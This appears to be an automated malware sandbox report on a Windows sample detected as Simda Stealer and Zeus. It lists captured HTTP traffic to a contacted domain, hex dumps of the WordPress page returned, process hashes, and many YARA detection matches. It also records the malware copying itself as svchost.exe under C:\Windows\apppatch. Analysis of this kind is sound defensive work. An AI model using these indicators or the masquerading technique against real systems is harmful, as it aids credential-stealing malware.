                                                                                                                                                                                                              11192.168.2.857741188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:35:06 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:06 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4NET2WR9%2FwTbZSCRThkcXg6sf35VPYv%2FcoT27yeOvT2zzuT28d4qTBDjGR3aXNqiPSrD%2FWZvZ6nmEAr0XoMgIrqDBpezhm6TF6O400VZVpmGqz0J9vJam1lQvfs8BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10096fdadf8c21-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1440&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1987645&cwnd=251&unsent_bytes=0&cid=37722d2a241cb4e3&ts=800&x=0"
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC422INData Raw: 37 63 61 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7caa<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                                                                                                                                              Data Ascii: e><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta proper
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69
                                                                                                                                                                                                              Data Ascii: c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.wi
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73
                                                                                                                                                                                                              Data Ascii: =typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pars
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69
                                                                                                                                                                                                              Data Ascii: atemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/mai
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69
                                                                                                                                                                                                              Data Ascii: escription{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-wei
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63
                                                                                                                                                                                                              Data Ascii: bkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{c
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e
                                                                                                                                                                                                              Data Ascii: .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-con
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70
                                                                                                                                                                                                              Data Ascii: .woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="p
                                                                                                                                                                                                              2024-11-11 17:35:07 UTC1369INData Raw: 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32
                                                                                                                                                                                                              Data Ascii: woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .select2


                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:12:33:04
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\arxtPs1STE.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\arxtPs1STE.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:216'576 bytes
                                                                                                                                                                                                              MD5 hash:6154C4F64B8F9185A4644CDEA5C69408
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:12:33:05
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:216'576 bytes
                                                                                                                                                                                                              MD5 hash:5415F923D36E5D49E48A46CDF5D4B082
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1843970657.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1887006927.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1889204820.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1897674355.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1899518628.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1936749953.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1802342422.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1892734452.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1937280291.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1832269912.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1900019972.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1893633503.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1919368621.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1781590454.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1931753545.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2654834253.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1407157898.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1892977069.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1771500442.0000000004190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2655337628.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1893366330.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1900579687.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1788047378.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1896507148.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1937495676.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1892490476.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1808599127.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1910755217.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1888344420.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1917963207.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1751304205.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
